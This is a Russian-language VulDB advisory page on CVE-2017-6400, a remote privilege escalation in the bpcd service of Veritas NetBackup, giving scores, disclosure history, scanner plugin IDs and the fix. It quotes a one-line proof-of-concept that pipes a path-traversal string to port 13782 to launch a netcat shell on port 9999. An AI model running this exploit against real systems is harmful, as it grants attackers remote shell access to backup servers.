| CVSS Meta Temp Score | Текущая цена эксплойта (≈) | Балл интереса CTI |
|---|---|---|
| 7.6 | $0-$5k | 0.00 |
Сводка
Уязвимость была найдена в Veritas NetBackup 6.x/7.x. Она была оценена как проблематичный. Вовлечена неизвестная функция компонента bpcd. Манипуляция приводит к эскалация привилегий. Эта уязвимость обозначается как CVE-2017-6400. Атака может быть инициирована удаленно. Более того, существует эксплойт. Рекомендуется обновить затронутый компонент.
Подробности
Уязвимость была найдена в Veritas NetBackup 6.x/7.x. Она была оценена как проблематичный. Вовлечена неизвестная функция компонента bpcd. Манипуляция приводит к эскалация привилегий. Использование CWE для описания проблемы приводит к CWE-264. Слабость была опубликована 01.03.2017 специалистом Sven Blumenstein, Xiaoran Wang and Andrew Griffiths от компании Google под идентификатором Veritas NetBackup v6.x, v7.x, v8.0 and NetBackup appliances v2.x, v3.0 - Multiple Critical Vulnerabilities как Mailinglist Post (Full-Disclosure). Консультация доступна для загрузки на seclists.org. Публичный релиз произошёл без координации с поставщиком.
Эта уязвимость обозначается как CVE-2017-6400. Атака может быть инициирована удаленно. Технические подробности отсутствуют. Популярность этой уязвимости ниже среднего. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. В настоящее время текущая цена эксплойта неизвестна. Согласно MITRE ATT&CK, техника атаки, используемая в данной проблеме, имеет значение T1068. В уведомлении отмечается:
Multiple critical vulnerabilities were identified in Veritas NetBackup and NetBackup appliance. The vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive.
Объявляется Доказательство концепции. Эксплойт доступен для загрузки на сайте seclists.org. Уязвимость обрабатывалась как непубличный эксплойт нулевого дня в течение как минимум 92 дней. В 0-дневный период предполагаемая подземная цена составляла около $0-$5k. Код, используемый эксплойтом, следующий:
echo -ne "-437860936\x00\x00\x00\x31\x00\x00\x00O/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc foo -lp 9999 -e/bin/sh" | nc 127.0.0.1 13782В сканере Nessus имеется плагин с ID 104888. Он отнесён к семейству CGI abuses. Коммерческий сканер уязвимостей Qualys способен проверить эту проблему с помощью плагина 370336 (Veritas NetBackup Multiple Vulnerabilities.(VTS17-003)).
Обновление до 8.0 может устранить эту уязвимость. Рекомендуется обновить затронутый компонент. В предупреждении указано следующее:
The target date for patches that fix these issues is 29th September, 2017.
Данная уязвимость также присутствует в других базах данных уязвимостей: SecurityFocus (BID 96484) и Tenable (104888).
Затронуто
- Veritas NetBackup Appliance 6.x/7.x
- Veritas NetBackup Appliances 2.x
Продукт
Тип
Поставщик
Имя
Версия
Лицензия
CPE 2.3
CPE 2.2
CVSSv4
VulDB Вектор: 🔍VulDB Надёжность: 🔍
CVSSv3
VulDB Meta Base Score: 9.2VulDB Meta Temp Score: 8.7
VulDB Базовый балл: 8.8
VulDB Временная оценка: 7.3
VulDB Вектор: 🔍
VulDB Надёжность: 🔍
Поставщик Базовый балл (Veritas): 9.9
Поставщик Vector (Veritas): 🔍
NVD Базовый балл: 8.8
NVD Вектор: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Вектор | Сложность | Аутентификация | Конфиденциальность | Целостность | Доступность |
|---|---|---|---|---|---|
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍
NVD Базовый балл: 🔍
Эксплуатация
Класс: эскалация привилегийCWE: CWE-264
CAPEC: 🔍
ATT&CK: 🔍
Физический: Частично
Локальный: Да
Удалённый: Да
Доступность: 🔍
Доступ: публичный
Статус: Доказательство концепции
Автор: Sven Blumenstein/Xiaoran Wang/Andrew Griffiths
Скачать: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Прогноз цен: 🔍
Оценка текущей цены: 🔍
| 0-Day | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
|---|---|---|---|---|
| Сегодня | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
Nessus ID: 104888
Nessus Имя: Veritas NetBackup Appliance < 2.7.2 / 3.1.0 Multiple Vulnerabilities (VTS17-003)
Nessus Файл: 🔍
Nessus Семейство: 🔍
Qualys ID: 🔍
Qualys Имя: 🔍
Разведка угроз
Интерес: 🔍Активные акторы: 🔍
Активные группы APT: 🔍
Контрмеры
Рекомендация: ОбновлениеСтатус: 🔍
0-дневное время: 🔍
Задержка эксплуатации: 🔍
Обновление: NetBackup 8.0
Хронология
29.11.2016 🔍02.12.2016 🔍
01.03.2017 🔍
01.03.2017 🔍
01.03.2017 🔍
02.03.2017 🔍
19.04.2017 🔍
Источники
Консультация: Veritas NetBackup v6.x, v7.x, v8.0 and NetBackup appliances v2.x, v3.0 - Multiple Critical VulnerabilitiesИсследователь: Sven Blumenstein, Xiaoran Wang, Andrew Griffiths
Организация: Google
Статус: Не определено
CVE: CVE-2017-6400 (🔍)
GCVE (CVE): GCVE-0-2017-6400
GCVE (VulDB): GCVE-100-97355
SecurityFocus: 96484
scip Labs: https://www.scip.ch/en/?labs.20161013
Смотрите также: 🔍
Вход
Создано: 01.03.2017 11:08Обновлено: 19.04.2017 10:34
Изменения: 01.03.2017 11:08 (69), 19.04.2017 10:34 (24)
Завершенный: 🔍
Cache ID: 216::103
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Комментариев пока нет. Языки: ru + be + en.
Пожалуйста, войдите в систему, чтобы прокомментировать.